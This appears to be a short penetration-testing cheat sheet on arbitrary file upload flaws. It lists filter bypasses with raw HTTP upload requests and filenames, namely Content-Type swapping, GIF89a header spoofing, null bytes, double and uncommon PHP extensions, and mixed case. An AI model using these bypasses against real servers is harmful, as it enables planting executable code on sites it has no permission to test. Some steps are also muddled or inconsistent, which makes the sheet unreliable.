# Arbitrary File Upload ## Introduction An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server. ## Where to find In upload file feature, for example upload photo profile feature ## How to exploit 1. Change the `Content-Type` value ``` POST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: application/x-php ``` Change the Content-Type ``` POST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: image/jpeg ``` 2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file ``` POST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" Content-Type: application/x-php ``` Change the request to this ``` POST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: application/x-php ``` 3. Upload the payload, but start with GIF89a; and ``` POST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: image/gif GIF89a; ``` And dont forget to change the content-type to image/gif 4. Bypass content length validation, it can be bypassed using small payload ``` () ``` 5. Using null byte in filename ``` file.php%00.gif ``` 6. Using double extensions for the uploaded file ``` file.jpg.php ``` 7. Uploading an unpopular php extensions (php4,php5,php6,phtml) ``` file.php5 ``` 8. Try to randomly capitalizes the file extension ``` file.pHP5 ``` 9. Mix the tips!